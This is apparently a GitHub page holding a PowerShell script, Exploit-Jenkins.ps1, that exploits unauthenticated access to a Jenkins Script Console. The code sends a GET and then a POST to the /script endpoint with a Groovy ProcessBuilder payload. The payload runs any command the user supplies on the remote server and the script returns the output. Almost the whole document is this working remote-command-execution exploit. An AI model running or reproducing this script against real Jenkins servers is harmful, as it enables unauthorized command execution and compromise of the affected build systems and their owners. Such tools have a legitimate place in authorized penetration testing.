-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathExploit-Jenkins.ps1
75 lines (63 loc) · 2.36 KB
/
Exploit-Jenkins.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
function Exploit-Jenkins() {
<#
.SYNOPSIS
PowerShell delivery for unauthenticated access to Jenkins Script Console
.PARAMETER Rhost.
Host to exploit
.PARAMETER Port
Port to use.
.PARAMETER Cmd
Command to run on remote Jenkins Script Console
.EXAMPLE
Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd whoami
Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd "cmd /c netstat -an"
.LINK
http://twitter.com/luxcupitor
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[string] $Rhost,
[Parameter(Mandatory=$True)]
[string] $Cmd,
[Parameter(Mandatory=$False)]
[Int] $Port
)
Add-Type -Assembly System.Web
$url = "http://"+$($Rhost)+":"+$($Port)+"/script"
$cookiejar = New-Object System.Net.CookieContainer
$Cmd = $Cmd -replace "\s","','"
$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
# Login
$webrequest = [System.Net.HTTPWebRequest]::Create($url);
$webrequest.CookieContainer = New-Object System.Net.CookieContainer;
$webrequest.Method = "GET"
$webrequest.Credentials = $credCache
if ($cookiejar -ne $null) { $webrequest.CookieContainer = $cookiejar }
$response = $webrequest.GetResponse()
$responseStream = $response.GetResponseStream()
$streamReader = New-Object System.IO.Streamreader($responseStream)
$output = $streamReader.ReadToEnd()
$postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"%27%29.redirectErrorStream%28true%29.start%28%29.text&Submit=Run"
$bytearray = [System.Text.Encoding]::UTF8.GetBytes($postdata)
# Second request
$webrequest = [System.Net.HTTPWebRequest]::Create($url)
$webrequest.Credentials = $credCache
if ($cookiejar -ne $null) { $webrequest.CookieContainer=$cookiejar }
$webrequest.Method = "POST"
$webrequest.ContentType = "application/x-www-form-urlencoded"
$webrequest.ContentLength = $bytearray.Length
$requestStream = $webrequest.GetRequestStream()
# Post data
$requestStream.Write($bytearray, 0, $bytearray.Length)
$requestStream.Close()
$response = $webrequest.GetResponse()
$responseStream = $response.GetResponseStream()
# Get Response
$streamReader = New-Object System.IO.Streamreader($responseStream)
$output = $streamReader.ReadToEnd()
$null = $output -match "Result</h2><pre>((?si).+?)</pre>"
#Write-Output $matches[1]
#return $output
return $matches[1]
}